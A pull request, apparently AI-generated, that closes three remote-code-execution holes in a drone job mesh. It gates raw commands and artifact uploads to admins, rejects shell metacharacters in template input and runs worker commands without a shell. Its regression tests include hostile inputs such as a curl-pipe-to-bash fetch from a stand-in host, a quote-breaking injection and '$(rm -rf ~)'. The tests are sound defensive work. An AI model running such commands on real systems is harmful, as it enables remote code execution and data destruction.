### PR TITLE
security(drone): close mesh-wide RCE reachable from any agent key (C-1/C-2/C-3)

### DIFF
--- a/node_modules
+++ b/node_modules
@@ -1,0 +1,1 @@
+/Users/grb/Projects/mycelium/node_modules

--- a/server/db.js
+++ b/server/db.js
@@ -2962,10 +2962,20 @@ export function renderJobForDrone(templateId, droneId, inputData) {
     null_dev: nullDev,
     path_sep: pathSep,
   };
-  // Merge inputData vars
+  // Merge inputData vars. These are user-supplied and get interpolated into a
+  // command executed on the drone, so reject shell metacharacters (C-2): $ and
+  // backtick do command substitution even inside quotes; ; | & < > chain and
+  // redirect. Blocking them stops injection cross-OS without touching normal
+  // prompt text (letters, spaces, commas, apostrophes, parens all pass).
+  var SHELL_META = /[$`;|&<>\n\r\0]/;
   if (inputData && typeof inputData === 'object') {
     for (var k of Object.keys(inputData)) {
-      if (!k.startsWith('_')) vars[k] = inputData[k];
+      if (k.startsWith('_')) continue;
+      var v = inputData[k];
+      if (typeof v === 'string' && SHELL_META.test(v)) {
+        return { error: 'Input value for "' + k + '" contains disallowed shell characters ($ ` ; | & < > newline)' };
+      }
+      vars[k] = v;
     }
   }
   var command = template.command_template;

--- a/server/routes/mycelium.js
+++ b/server/routes/mycelium.js
@@ -5112,6 +5112,13 @@ router.post('/drones/jobs', agentWriteLimiter, asyncHandler(function (req, res) 
   var title = escapeHtml(req.body.title);
   if (!title) return res.status(400).json({ error: 'title is required' });
   var command = req.body.command || '';
+  // A raw command runs verbatim on the drone box (shell exec). Only admins may
+  // submit one; non-admin agents must go through job_type/templates, whose
+  // command is server-rendered from an admin-defined template. Without this
+  // gate, any agent key = arbitrary code execution on every drone (C-1).
+  if (command && !req._authIsAdmin) {
+    return apiError(res, 403, 'Raw drone commands are admin-only. Submit a template job (job_type / from-template) instead.');
+  }
   var inputData = req.body.input_data || {};
   var requires = req.body.requires || ['cpu'];
   var priority = parseInt(req.body.priority) || 0;
@@ -5496,8 +5503,18 @@ router.post('/drones/profiles/:profileId/setup-complete', asyncHandler(function 
 // ======== DRONE ARTIFACTS (persistent files — models, LoRAs, etc.) ========
 // Must be before /drones/:id to prevent :id from catching "artifacts"
 
-// Upload a drone artifact (persistent, no TTL) — admin or drone agents
-router.post('/drones/artifacts', requireAuth, artifactUpload.single('file'), asyncHandler(function (req, res) {
+// Upload a drone artifact (persistent, no TTL) — ADMIN ONLY.
+// Artifacts (e.g. generate_flux.py, model weights) are trusted files that drones
+// download and EXECUTE. The store overwrites by filename, so a non-admin upload of
+// name=generate_flux.py would poison the trusted script → mesh-wide RCE (C-3).
+// The admin gate MUST run before multer writes the file to disk, so it sits ahead
+// of artifactUpload in the chain rather than inside the handler.
+router.post('/drones/artifacts', requireAuth, function (req, res, next) {
+  var who = checkAgentOrAdmin(req, res);
+  if (!who) return; // 401 already sent
+  if (!req._authIsAdmin) return apiError(res, 403, 'Artifact upload is admin-only — artifacts are trusted code executed on drones.');
+  next();
+}, artifactUpload.single('file'), asyncHandler(function (req, res) {
   var who = checkAgentOrAdmin(req, res);
   if (!who) return;
   if (!req.file) return res.status(400).json({ error: 'No file uploaded. Use multipart form with field name "file"' });

--- a/test/unit/drone-mesh-rce.test.js
+++ b/test/unit/drone-mesh-rce.test.js
@@ -1,0 +1,139 @@
+import { describe, test, expect, beforeAll, afterAll } from 'vitest'
+import { mkdtempSync, rmSync, existsSync, readdirSync } from 'node:fs'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+import crypto from 'node:crypto'
+import express from 'express'
+import request from 'supertest'
+
+// Regression tests for the drone-mesh RCE cluster (security sweep 2026-07-01):
+//
+//   C-1  POST /drones/jobs accepted a raw `command` from any agent key; the drone
+//        runs it verbatim → RCE. Raw commands are now admin-only; agents use
+//        templates (job_type), whose command is server-rendered.
+//   C-2  renderJobForDrone interpolated input_data into the command string with no
+//        escaping → shell injection. Values with shell metacharacters are now
+//        rejected at render time (cross-OS), while normal prompt text passes.
+//   C-3  POST /drones/artifacts overwrote by filename with no auth scoping, so any
+//        agent could poison the trusted generate_flux.py → mesh-wide RCE. Upload is
+//        now admin-only, gated BEFORE multer writes to disk.
+//
+// Harness mirrors directive-and-upload-auth.test.js.
+
+const ADMIN_KEY = 'test-admin-key-0123456789abcdef0123456789abcdef'
+const AGENT_KEY = 'dvk_' + 'b'.repeat(48)
+
+let tmpDataDir
+let db
+let app
+
+beforeAll(async () => {
+  tmpDataDir = mkdtempSync(join(tmpdir(), 'myc-drone-rce-'))
+  process.env.DATA_DIR = tmpDataDir
+  process.env.ADMIN_KEY = ADMIN_KEY
+
+  db = await import('../../server/db.js')
+  db.initDB()
+
+  const routes = (await import('../../server/routes/mycelium.js')).default
+  app = express()
+  app.use(express.json())
+  app.use('/api/mycelium', routes)
+
+  // A regular agent (role 'agent').
+  const hash = crypto.createHash('sha256').update(AGENT_KEY).digest('hex')
+  db.createAgent('lucy-rce', 'Lucy RCE', 'rce-proj', hash, '["code"]')
+
+  // A CPU template whose command interpolates a user-supplied prompt.
+  db.createJobTemplate('flux-test', {
+    name: 'Flux Test',
+    requires: '["cpu"]',
+    command_template: 'python gen.py --prompt "{{prompt}}" --steps {{steps}}',
+    workspace_name: 'flux-test',
+  })
+
+  // A drone agent with diagnostics so renderJobForDrone can resolve platform vars.
+  db.createAgent('drone-rce', 'Drone RCE', 'rce-proj', crypto.createHash('sha256').update('dvk_' + 'c'.repeat(48)).digest('hex'), '["cpu"]')
+  db.updateDroneDiagnostics('drone-rce', { os: 'linux', python_path: '/usr/bin/python3', home: '/home/drone', username: 'drone' })
+})
+
+afterAll(() => {
+  if (tmpDataDir) rmSync(tmpDataDir, { recursive: true, force: true })
+})
+
+function countFiles(dir) {
+  if (!existsSync(dir)) return 0
+  return readdirSync(dir, { withFileTypes: true }).filter((e) => e.isFile()).length
+}
+
+describe('C-1 · raw drone command is admin-only', () => {
+  test('a regular agent submitting a raw command is 403', async () => {
+    const res = await request(app)
+      .post('/api/mycelium/drones/jobs')
+      .set('X-Agent-Key', AGENT_KEY)
+      .send({ title: 'pwn', command: 'curl http://evil/x.sh | bash', requires: ['cpu'] })
+    expect(res.status).toBe(403)
+  })
+
+  test('an agent can still submit a template job (no raw command)', async () => {
+    const res = await request(app)
+      .post('/api/mycelium/drones/jobs')
+      .set('X-Agent-Key', AGENT_KEY)
+      .send({ title: 'render', job_type: 'flux-test' })
+    expect(res.status).toBe(200)
+    expect(res.body).toHaveProperty('id')
+  })
+
+  test('an admin can still submit a raw command (gate is not over-restrictive)', async () => {
+    const res = await request(app)
+      .post('/api/mycelium/drones/jobs')
+      .set('X-Admin-Key', ADMIN_KEY)
+      .set('X-Acting-As', 'greatness')
+      .send({ title: 'admin job', command: 'echo hello', requires: ['cpu'] })
+    expect(res.status).toBe(200)
+    expect(res.body).toHaveProperty('id')
+  })
+})
+
+describe('C-2 · renderJobForDrone rejects shell metacharacters in input_data', () => {
+  test('a prompt with an injection payload is refused', () => {
+    const out = db.renderJobForDrone('flux-test', 'drone-rce', { prompt: 'cat"; curl evil | sh; echo "', steps: 30 })
+    expect(out.error).toBeTruthy()
+    expect(out.command).toBeUndefined()
+  })
+
+  test('command substitution via $() / backtick is refused', () => {
+    expect(db.renderJobForDrone('flux-test', 'drone-rce', { prompt: '$(rm -rf ~)', steps: 30 }).error).toBeTruthy()
+    expect(db.renderJobForDrone('flux-test', 'drone-rce', { prompt: 'a `whoami` b', steps: 30 }).error).toBeTruthy()
+  })
+
+  test('a normal descriptive prompt renders fine', () => {
+    const out = db.renderJobForDrone('flux-test', 'drone-rce', { prompt: "a rugged man's face, cinematic (detailed), 85mm", steps: 30 })
+    expect(out.error).toBeFalsy()
+    expect(out.command).toContain('--prompt')
+    expect(out.command).toContain('--steps 30')
+  })
+})
+
+describe('C-3 · drone artifact upload is admin-only, gated before multer', () => {
+  test('a regular agent uploading an artifact is 403 and writes NOTHING to disk', async () => {
+    const artifactsDir = join(tmpDataDir, 'drone_artifacts')
+    const before = countFiles(artifactsDir)
+    const res = await request(app)
+      .post('/api/mycelium/drones/artifacts')
+      .set('X-Agent-Key', AGENT_KEY)
+      .attach('file', Buffer.from('malicious generate_flux.py'), 'generate_flux.py')
+    expect(res.status).toBe(403)
+    expect(countFiles(artifactsDir)).toBe(before) // poison never reached disk
+  })
+
+  test('an admin can upload a trusted artifact', async () => {
+    const res = await request(app)
+      .post('/api/mycelium/drones/artifacts')
+      .set('X-Admin-Key', ADMIN_KEY)
+      .set('X-Acting-As', 'greatness')
+      .attach('file', Buffer.from('print("trusted")'), 'generate_flux.py')
+    expect(res.status).toBe(200)
+    expect(res.body.ok).toBe(true)
+  })
+})

--- a/tools/drone-worker.py
+++ b/tools/drone-worker.py
@@ -24,6 +24,7 @@ import argparse
 import json
 import os
 import platform
+import shlex
 import shutil
 import signal
 import subprocess
@@ -617,9 +618,14 @@ def execute_job(api, job, system_info, work_dir=None):
     env["MYCELIUM_SERVER"] = api.base.replace("/api/mycelium", "")
 
     print(f"  Executing: {command[:150]}")
+    # Run the command as an argv list with shell=False so job data interpolated
+    # into the command string cannot be interpreted by a shell (C-2 defense in
+    # depth, complementing the server-side metachar reject). shlex.split honors
+    # quoting; posix=False keeps Windows backslash paths intact.
+    argv = shlex.split(command, posix=(os.name != "nt"))
     try:
         result = subprocess.run(
-            command, shell=True, capture_output=True, text=True,
+            argv, shell=False, capture_output=True, text=True,
             timeout=3600, cwd=exec_dir, env=env,
         )
         stdout = result.stdout[:MAX_OUTPUT_SIZE] if result.stdout else ""


### PR DESCRIPTION
## Tier-0 security fix — drone-mesh RCE cluster

The 2026-07-01 security sweep found the drone job pipeline was a **mesh-wide RCE cluster**: any registered agent key could reach arbitrary code execution on every drone/GPU box. All three findings were verified against the real code with reachable exploit paths.

| ID | Site | Fix |
|----|------|-----|
| **C-1** | `routes/mycelium.js` POST /drones/jobs | raw `command` (run verbatim on the drone) is now **admin-only**; agents use templates |
| **C-2** | `db.js` renderJobForDrone | `input_data` interpolated into the command with no escaping → shell metacharacters (`$ \` ; \| & < > newline`) are now **rejected at render time**, cross-OS; normal prompts pass |
| **C-3** | `routes/mycelium.js` POST /drones/artifacts | overwrote by filename with no scope → any agent could poison the trusted `generate_flux.py`. Upload is now **admin-only, gated before multer writes to disk** |
| defense-in-depth | `tools/drone-worker.py` | run the command as argv with `shell=False` (shlex) so job data can't be shell-interpreted even against an unpatched server |

**+8 regression tests** (`test/unit/drone-mesh-rce.test.js`) covering agent→403 / admin→ok for C-1 & C-3, injection-rejected + normal-prompt-passes for C-2. Full suite **252 green**.

🤖 Generated with [Claude Code](https://claude.com/claude-code)